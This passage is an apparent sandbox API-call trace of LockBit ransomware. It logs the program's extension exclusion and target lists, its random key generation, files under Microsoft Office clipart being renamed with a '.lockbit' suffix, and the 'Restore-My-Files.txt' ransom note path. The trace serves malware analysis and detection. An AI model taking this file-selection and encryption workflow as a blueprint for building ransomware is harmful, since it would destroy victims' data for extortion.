(lpString1=".mp3", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.989] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00669_.WMF") returned 1 [0117.990] lstrcmpiW (lpString1="ntldr", lpString2="HH00669_.WMF") returned 1 [0117.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00669_.WMF") returned 1 [0117.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00669_.WMF") returned -1 [0117.990] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00669_.WMF") returned -1 [0117.990] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00669_.WMF") returned 1 [0117.990] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00669_.WMF") returned 1 [0117.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF") returned=".WMF" [0117.990] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.990] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.990] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.991] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.991] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.lockbit") returned 72 [0117.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.992] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.992] malloc (_Size=0x40068) returned 0x3d70450 [0117.992] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=11490) returned 1 [0117.992] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.993] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0118.027] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.027] malloc (_Size=0xa6) returned 0x77d7a8 [0118.027] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0118.027] free (_Block=0x77d7a8) [0118.027] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.027] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.027] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.028] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39dc9c00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39dc9c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x2454, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00681_.WMF", cAlternateFileName="")) returned 1 [0118.028] lstrcmpiW (lpString1=".", lpString2="HH00681_.WMF") returned -1 [0118.028] lstrcmpiW (lpString1="..", lpString2="HH00681_.WMF") returned -1 [0118.028] PathFindExtensionW (pszPath="HH00681_.WMF") returned=".WMF" [0118.028] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.028] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.029] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.029] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00681_.WMF") returned 1 [0118.030] lstrcmpiW (lpString1="ntldr", lpString2="HH00681_.WMF") returned 1 [0118.030] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00681_.WMF") returned 1 [0118.030] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00681_.WMF") returned -1 [0118.030] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00681_.WMF") returned -1 [0118.030] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00681_.WMF") returned 1 [0118.030] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00681_.WMF") returned 1 [0118.030] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.030] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF") returned=".WMF" [0118.030] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.030] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.030] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.031] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.031] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.lockbit") returned 72 [0118.031] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0118.032] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.032] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.032] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9300) returned 1 [0118.032] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.033] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.033] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.033] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.035] malloc (_Size=0xa6) returned 0x77d7a8 [0118.035] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.036] free (_Block=0x77d7a8) [0118.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.036] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.036] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cf47e00, ftCreationTime.dwHighDateTime=0x1bd4b1e, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3cf47e00, ftLastWriteTime.dwHighDateTime=0x1bd4b1e, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00685_.WMF", cAlternateFileName="")) returned 1 [0118.036] lstrcmpiW (lpString1=".", lpString2="HH00685_.WMF") returned -1 [0118.037] lstrcmpiW (lpString1="..", lpString2="HH00685_.WMF") returned -1 [0118.037] PathFindExtensionW (pszPath="HH00685_.WMF") returned=".WMF" [0118.037] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.037] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.038] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00685_.WMF") returned 1 [0118.039] lstrcmpiW (lpString1="ntldr", lpString2="HH00685_.WMF") returned 1 [0118.039] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00685_.WMF") returned 1 [0118.039] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00685_.WMF") returned -1 [0118.039] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00685_.WMF") returned -1 [0118.039] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00685_.WMF") returned 1 [0118.039] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00685_.WMF") returned 1 [0118.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF") returned=".WMF" [0118.039] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.039] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.039] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.040] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.040] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.lockbit") returned 72 [0118.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.041] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.041] malloc (_Size=0x40068) returned 0x3e70008 [0118.041] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4032) returned 1 [0118.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.043] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.047] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.047] malloc (_Size=0xa6) returned 0x77d7a8 [0118.047] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.048] free (_Block=0x77d7a8) [0118.048] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.048] 